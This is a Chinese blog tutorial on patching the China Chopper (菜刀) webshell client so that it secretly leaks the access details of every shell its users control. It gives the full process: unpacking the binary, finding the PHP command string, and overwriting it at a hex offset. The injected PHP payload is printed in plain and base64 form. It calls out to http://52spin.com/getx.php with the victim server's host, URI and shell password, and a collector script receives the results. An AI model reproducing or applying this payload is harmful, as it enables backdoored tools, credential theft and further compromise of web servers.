小白也能给菜刀添加PHP后门

2016-7-3 admin 安全工具

记得去年某段时间,有个ID帐号在习科论坛发了个过狗的菜刀,冒充绿盟的人员四处发布带后门的菜刀,最后被大习科的某大神分分钟打脸,分析出菜刀带有后面,那么!小白如何才能在菜刀添加后门~??(添加后门和反后门差不多。除非是特屌的那种我们需要的工具有 OD K8的飞刀一把 十六进制编辑器010 Editor 6.0 OC偏移量转换器 还有我们的主角神器中国菜刀。我这里用的菜刀是caidao-20141213 红色版本,去年菜刀官网新发布的最新版本,具体大家想用什么的可以自己看着办,OK,第一步,先查壳脱壳,用PEiD查到菜刀使用的是UPX的壳脱壳的话网上下载个UPX的脱壳机就可以了,烂大街了,这里就不说了,脱壳完后本地IE设置代,127.0.0.1端口8080,那么我们就可以使用BurpLoader来拦截菜刀的数据包了,我们今天做一个在编辑文件然后在执行保存这个操作时候触发后门的这个菜刀,

抓到的数据包如下:
xiao=$xx%3Dchr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99). chr(111).chr(100).chr(101);$yy=$_POST;@eval//($xx//($yy[z0]));&z0=QGluaV9zZXQoImRpc 3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V 0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztlY2hvIEBmd3JpdGUoZm9w ZW4oYmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pLCJ3IiksYmFzZTY0X2RlY29kZSgkX1BPU1 RbInoyIl0pKT8iMSI6IjAiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=L2hvbWUvd2ViLzUyc3B pbl9jb20vcHVibGljX2h0bWwvuvPDxS50eHQ%3D&z2=MTIzNDU%3D

我们需要改造的只需要Z0这一段
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X2 1hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztlY2hvIEBmd3JpdGUoZm9wZW 4oYmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pLCJ3IiksYmFzZTY0X2RlY29kZSgkX1BPU1Rb InoyIl0pKT8iMSI6IjAiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D

使用K8飞刀解密,先执行URL解码,再进行Base64解码,解完后效果如下:

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|"); ;echo@fwrite(fopen(base64_decode($_POST["z1"]),"w"),base64_decode($_POST["z2"]))?"1":"0"; ;echo("|<-");die();

现在使用OD打开已经脱壳的菜刀主程序,右键查找关键字符串
echo @fwrite(fopen(base64_decode($_POST["z1"]),"w")

可知关键字符串对应内存地址是004492DE
现在使用 十六进制编辑器010 Editor 6.0 打开菜刀主程序,拉到底部,我这里选的偏移地址是ACC00,通过OC偏移量转换器可知对应的内存地址是004ADCC0

所以现在我们只需要把后门代码添加到ACCC0这个偏移就可以了
这是未修改的数据包:
echo @fwrite(fopen(base64_decode($_POST["z1"]),"w"),base64_decode($_POST["z2"]))?"1":"0";

这是要修改的数据包:

本帖隐藏的内容

echo @fwrite(fopen(base64_decode($_POST["z1"]),"w"),base64_decode($_POST["z2"]))?"1":"0"; if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://52spin.com/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

后面多了
if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://52spin.com/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
我们使用16进制编辑器对后门代码进行转换,并转换成双字节,工具-转换

把转换后的代码在菜刀偏移地址ACC00处开始覆盖相同大小的数据,然后保存,到这里添加后门 基本已经完成了

使用OD打开已经添加好后门的菜刀,跳转到关键字符串的004492DE地址

双击进行修改
然后保存,带有后门的菜刀就做好了。修改后抓到的数据包:
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X 21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztlY2hvIEBmd3JpdGUoZm9wZ W4oYmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pLCJ3IiksYmFzZTY0X2RlY29kZSgkX1BPU1 RbInoyIl0pKT8iMSI6IjAiO2lmKEAkX0NPT0tJRVsnZjEnXSE9OTUpe0BzZXRjb29raWUoJ2Y xJyw5NSk7QGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vNTJzcGluLmNvbS9nZXR4LnBocD 9jYWlkYW89Jy4kX1NFUlZFUltIVFRQX0hPU1RdLiRfU0VSVkVSW1JFUVVFU1RfVVJJXS4nX 1A9Jy5rZXkoJF9QT1NUKSk7fSA7ZWNobygifDwtIik7ZGllKCk7
解码后=
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0); echo("->|");;echo@fwrite(fopen(base64_decode($_POST["z1"]),"w"),base64_decode ($_POST["z2"]))?"1":"0";if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents ('http://52spin.com/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST _URI].'_P='. key($_POST));} ;echo("|<-");die();

在服务器根目录添加个接收shell地址和密码的PHP脚本文件getx.php
文件代码:

getx.php:

就可以在 后门.txt的文本里收到shell地址
52spin.com/m/1.php_P=xiao

标签: 菜刀

发表评论:

Powered by X兵器库 桂ICP备16000990号
sitemap
返回顶部